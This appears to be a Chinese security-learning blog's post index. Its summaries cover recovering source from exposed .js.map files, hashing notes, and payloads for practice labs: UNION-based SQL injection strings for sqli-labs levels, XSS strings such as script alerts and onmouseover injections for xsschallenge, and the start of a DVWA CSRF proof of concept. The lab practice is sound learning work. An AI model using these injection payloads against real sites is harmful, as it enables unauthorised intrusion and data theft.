2022年4月19日
dirscan/sourcemap/default
摘要: X-RAY 扫到dirscan/sourcemap/default漏洞,后缀为.js.map 还原代码: npm install --global reverse-sourcemap reverse-sourcemap -v xx.js.map -o soucecodes 阅读全文
posted @ 2022-04-19 11:05 划水ing 阅读(1633) 评论(0) 推荐(0)
2021年3月1日
加密/编码/进制笔记
摘要: 1、MD5加密 0-9,a-z 的组合(不区分大小写,长度固定) 一般分为32位和16位加密。MD5加密是不可逆的,但可以通过枚举的方式,进行解密。 2、SHA加密 0-9,a-z 的组合(不区分大小写,长度固定) SHA1、SHA256、SHA384、SHA512 区别是加密后的长度不同。 3、时 阅读全文
posted @ 2021-03-01 17:01 划水ing 阅读(146) 评论(0) 推荐(0)
2021年2月4日
sqli-labs(1-14关)
摘要: 第一关: ?id=1' and 1=2 union select 1,database(),3--+ 第二关: ?id=1 and 1=2 union select 1,database(),3 第三关: ?id=1') and 1=2 union select 1,database(),3--+ 阅读全文
posted @ 2021-02-04 11:42 划水ing 阅读(226) 评论(0) 推荐(0)
2021年2月3日
xsschallenge(1-13)payload记录
摘要: 第一关: ?name=<script>alert(/xss/)</script> 第二关: ?keyword="/onmouseover="alert(/xss/)" 第三关: ?keyword='/onmouseover='alert(/xss/)' 第四关: ?keyword="/onmouse 阅读全文
posted @ 2021-02-03 22:01 划水ing 阅读(100) 评论(0) 推荐(0)
2021年1月28日
DVWA-CSRF攻击失败(chrome浏览器)
摘要: 问题:在使用chrome浏览器测试 DVWA 中的 CSRF时,没有发送cookie POC: <html> <head> <meta charset="utf-8"> </head> <body> <img src="http://ipi地址/DVWA-master/vulnerabilities 阅读全文
posted @ 2021-01-28 15:05 划水ing 阅读(652) 评论(0) 推荐(0)
https://unpkg.com/live2d-widget-model-koharu@1.0.5/assets/koharu.model.json